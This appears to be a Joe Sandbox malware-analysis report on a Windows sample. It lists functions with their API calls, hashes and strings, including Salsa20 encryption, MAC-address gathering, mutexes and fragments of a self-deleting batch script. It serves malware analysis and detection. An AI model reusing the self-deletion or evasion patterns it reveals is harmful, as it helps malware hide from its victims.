                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                    • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                    • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                    • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                    • String ID: %.2X
                                                                                                                                                    • API String ID: 1637485200-213608013
                                                                                                                                                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                      • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                      • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                      • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                      • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                      • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                      • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                                    • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                                    • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                    • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                    • API String ID: 151064509-1805842116
                                                                                                                                                    • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                                    • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                                    • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                                    • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00680000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                    • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                      • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                      • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                    • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                    • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                    • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                    • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                    • _free.LIBCMT ref: 0040E745
                                                                                                                                                    Strings
                                                                                                                                                    • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                    • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                    • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                    • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                    • API String ID: 3901070236-1604013687
                                                                                                                                                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                      • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                      • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                                                                    • _memmove.LIBCMT ref: 00410427
                                                                                                                                                    • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                                                                    • _memmove.LIBCMT ref: 00410514
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 273148273-0
                                                                                                                                                    • Opcode ID: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                                                                                                                                                    • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                                                                    • Opcode Fuzzy Hash: 5d71b88130c3850f1ce6f9c9fc3c3b56fc5be04f011d63241bb511ce3f1a2a20
                                                                                                                                                    • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3232302685-0
                                                                                                                                                    • Opcode ID: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                                                                                                                                                    • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                                                                    • Opcode Fuzzy Hash: 17126a02ccb6bbc5f32dfe245874f9dcbc49a53b6c6b99fc4e7ab7c0e104719e
                                                                                                                                                    • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                    • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                                                                    • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                                                                    • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                                                                    • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wassert
                                                                                                                                                    • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                                                                    • API String ID: 3993402318-1975116136
                                                                                                                                                    • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                    • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                                                                    • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                    • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411178 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3989222877-0
                                                                                                                                                    • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                                    • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                                                                                                                                    • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                                                                    • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EA51 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3989222877-0
                                                                                                                                                    • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                                    • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                                                                                                                                    • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                                                                    • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040EC68 Relevance: 3.0, APIs: 2, Instructions: 19encryptionCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Crypt$ContextDestroyHashRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3989222877-0
                                                                                                                                                    • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                                    • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                                                                                                                                    • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                                                                    • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004278D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                    • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                                                                                                                                    • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                                                                                                                                                    • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                                                                                                                                    • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00412539
                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                                                                    • GetLastError.KERNEL32 ref: 0041255B
                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                                                    • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                                                    • API String ID: 2372642624-488272950
                                                                                                                                                    • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                    • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                                                                    • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                                                                    • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                                                    • API String ID: 909875538-2733969777
                                                                                                                                                    • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                    • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                                                                    • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                                                                    • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.1250825639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000002.00000002.1250825639.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1503006713-0
